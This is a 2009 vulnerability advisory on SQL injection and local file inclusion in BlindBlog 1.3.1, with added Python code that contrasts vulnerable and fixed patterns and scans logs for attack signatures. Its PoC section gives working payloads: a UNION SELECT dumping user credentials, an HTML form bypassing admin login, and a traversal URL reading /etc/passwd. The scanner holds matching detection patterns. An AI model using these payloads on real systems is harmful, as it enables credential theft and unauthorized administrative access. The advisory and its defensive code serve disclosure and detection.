Written by Salvatore 'drosophila' Fresta   
Wednesday, 04 March 2009 21:54
BlindBlog Multiple Local File Include and SQL Injection Vulnerabilities


-\\Bugtraq ID:
33980

-\\Class:
Input Validation Error

-\\CVE:


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 04 2009 12:00AM

-\\Updated:
Mar 04 2009 12:00AM

-\\Credit:
Salvatore 'drosophila' Fresta



-\\Vulnerable:
BlindBlog BlindBlog 1.3.1



-\\Discussion
BlindBlog is prone to a local file-include vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. Information harvested may aid in further attacks.

The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

BlindBlog 1.3.1 is vulnerable; other versions may also be affected.
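The two root causes described above, string-built SQL and a file include driven by an unchecked request parameter, are easiest to see side by side with their fixes. The following Python block is an added example written for this page; it is not BlindBlog code and does not reproduce the project's actual source. The table name cblog_users, the username and password columns, the MD5 scheme and the two payloads are taken from the advisory; the id column, the stored credential, the install path and the action names are assumptions. SQLite is used as a stand-in for MySQL, so an MD5() function is registered and the statement terminator is `--` instead of `#`.

```python
import hashlib
import hmac
import posixpath
import sqlite3

# Toy in-memory stand-in for the application's user table. Only the names
# cblog_users, username and password come from the advisory; the id column,
# the stored credential and the MD5 scheme are assumptions.
def make_db():
    con = sqlite3.connect(":memory:")
    # SQLite has no MD5(); register one so the advisory's payload, which
    # calls MD5('expl') server-side, can be evaluated here.
    con.create_function("MD5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    con.execute("CREATE TABLE cblog_users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO cblog_users VALUES (1, 'admin', ?)",
                (hashlib.md5(b"not-the-real-password").hexdigest(),))
    con.commit()
    return con

def login_vulnerable(con, username, password):
    """Hypothetical pre-fix pattern: the username is spliced into SQL text."""
    sql = f"SELECT id, username, password FROM cblog_users WHERE username = '{username}'"
    row = con.execute(sql).fetchone()
    return row is not None and row[2] == hashlib.md5(password.encode()).hexdigest()

def login_fixed(con, username, password):
    """Parameterised query: the username can only ever be a string value."""
    row = con.execute(
        "SELECT id, username, password FROM cblog_users WHERE username = ?",
        (username,),
    ).fetchone()
    digest = hashlib.md5(password.encode()).hexdigest()
    return row is not None and hmac.compare_digest(row[2], digest)

# The advisory's admin.login.php username payload. MySQL ends the statement
# with '#'; SQLite's line-comment marker is '--', which is the only change.
SQLI_USERNAME = "-1' UNION ALL SELECT 1,'admin',MD5('expl')-- "

ADMIN_DIR = "/var/www/blindblog/admin"               # assumed install path
ALLOWED_ACTIONS = {"posts", "comments", "settings"}  # assumed page names

def resolve_action_vulnerable(act):
    """Hypothetical pre-fix pattern: the act value is pasted into a path."""
    # PHP before 5.3.4 truncated file names at a NUL byte, so the appended
    # ".php" suffix was silently dropped; that is what %00 in the PoC does.
    return posixpath.normpath(ADMIN_DIR + act + ".php")

def resolve_action_fixed(act):
    """Allow-list first, then verify the normalised path stays in ADMIN_DIR."""
    if "\x00" in act or act not in ALLOWED_ACTIONS:
        raise ValueError("unknown admin action")
    path = posixpath.normpath(posixpath.join(ADMIN_DIR, f"admin.{act}.php"))
    # Defence in depth: on a live system use os.path.realpath here as well,
    # so that symlinks cannot move the resolved file outside the directory.
    if posixpath.commonpath([ADMIN_DIR, path]) != ADMIN_DIR:
        raise ValueError("resolved path escapes admin directory")
    return path

LFI_ACT = "/../../../../../../../etc/passwd\x00"     # PoC act value, URL-decoded

if __name__ == "__main__":
    con = make_db()
    print("vulnerable login bypassed:", login_vulnerable(con, SQLI_USERNAME, "expl"))
    print("fixed login bypassed:    ", login_fixed(con, SQLI_USERNAME, "expl"))
    print("vulnerable include path: ", repr(resolve_action_vulnerable(LFI_ACT)))
    try:
        resolve_action_fixed(LFI_ACT)
    except ValueError as exc:
        print("fixed include rejected:  ", exc)
```

The parameterised query is the whole SQL fix: the database receives the payload as a value to compare against, so no UNION is ever parsed. For the include, the allow-list does the real work; the containment check only guards against a future edit that builds paths from something other than the allow-list.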



-\\Exploit(s)/PoC(s):
Attackers can exploit these issues via a browser.

The following proof-of-concepts are available:

===============================================================
33980.html
^^^^^^^^^^^
http://www.example.com/path/comment.php?id=-1' UNION ALL SELECT NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23


<html>
    <head>
        <title>BlindBlog 1.3.1 Authentication Bypass Exploit</title>
    </head>
    <body>
        <form action="http://www.example.com/path/admin/admin.login.php?go=1" method="POST">
            <input type="hidden" name="username" value="-1' UNION ALL SELECT 1,'admin',MD5('expl')#">
            <input type="hidden" name="password" value="expl">
            <input type="submit" value="Exploit">
        </form>
    </body>
</html>


http://www.example.com/path/admin/admin.php?act=/../../../../../../../etc/passwd%00
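Two of the three PoCs above travel in the query string, so they leave a trace in ordinary web-server access logs. The following Python block is an added example for this page, not part of the advisory: it URL-decodes each request target and applies a few indicator rules shaped after the PoCs (UNION SELECT, a trailing comment marker, repeated `../`, and an embedded NUL byte). The log lines are constructed samples in Apache combined-log style using documentation IP ranges; the request paths mirror the advisory's PoCs plus benign traffic.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache-style access-log lines: benign traffic plus requests
# shaped like the advisory's comment.php and admin.php PoCs. Addresses are
# documentation ranges; nothing here is real captured traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Mar/2009:21:54:01 +0000] "GET /path/comment.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Mar/2009:21:54:07 +0000] "GET /path/comment.php?id=-1'%20UNION%20ALL%20SELECT%20NULL,CONCAT(username,%20char(58),%20password),3,4%20FROM%20cblog_users%23 HTTP/1.1" 200 6010 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Mar/2009:21:54:13 +0000] "POST /path/admin/admin.login.php?go=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Mar/2009:21:54:20 +0000] "GET /path/admin/admin.php?act=/../../../../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Mar/2009:21:55:02 +0000] "GET /path/admin/admin.php?act=posts HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the URL-decoded request target, so %23 and %00 are
# inspected as the '#' and NUL they become on the server.
RULES = [
    ("sqli-union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("sqli-comment-terminator", re.compile(r"#|--\s|--$")),
    ("lfi-traversal", re.compile(r"(?:\.\./){2,}")),
    ("lfi-null-byte", re.compile("\x00")),
]

def scan_log(text):
    """Return (ip, script, [rule names]) for every request that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        script = target.split("?", 1)[0]
        decoded = unquote(target)
        fired = sorted(name for name, rx in RULES if rx.search(decoded))
        if fired:
            hits.append((m.group("ip"), script, fired))
    return hits

def sources(hits):
    """Count flagged requests per client address, for triage ordering."""
    return Counter(ip for ip, _, _ in hits)

if __name__ == "__main__":
    for ip, script, fired in scan_log(SAMPLE_LOG):
        print(f"{ip} {script} {','.join(fired)}")
    print(sources(scan_log(SAMPLE_LOG)))
```

The admin.login.php bypass is the one this scan cannot see: the injected username is a POST body field, which access logs do not record. Catching it needs a WAF or application-level logging of the login parameters, or correlation of a successful admin login with the flagged requests from the same source shortly before it.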




-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us.



-\\Reference(s)
--Vendor Homepage
http://sourceforge.net/projects/cbblog  (BlindBlog)
--BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass -
http://www.securityfocus.com/archive/1/50142  (Salvatore "drosophila" Fresta)